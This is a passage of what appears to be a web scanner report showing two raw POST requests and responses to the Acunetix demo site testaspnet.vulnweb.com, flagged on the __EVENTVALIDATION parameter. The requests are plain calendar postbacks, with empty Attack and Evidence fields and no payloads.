advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8310&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgDAogwJpNoIZGRkg6LonmQmv8w0CTWh6IzmQezTmTg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLnv9%2FpAQLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gLJrBywU6CoX9bBc8zmEbo5XyQN%2Fg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:57:29 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgDAogwJpNoIZGRkg6LonmQmv8w0CTWh6IzmQezTmTg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLnv9/pAQLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gLJrBywU6CoX9bBc8zmEbo5XyQN/g==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:White" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1185 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,185 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8578&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgDAV3OhdtsIZGRk2N2Z8LuopXG70bfJvg9H58lSi%2F0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLo%2BI2yCgKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCvreQQ%2BBXMxZGBX3CPmX%2Fkc%2FvWsi
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:02:27 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgDAV3OhdtsIZGRk2N2Z8LuopXG70bfJvg9H58lSi/0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLo+I2yCgKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCvreQQ+BXMxZGBX3CPmX/kc/vWsi" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:White" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads 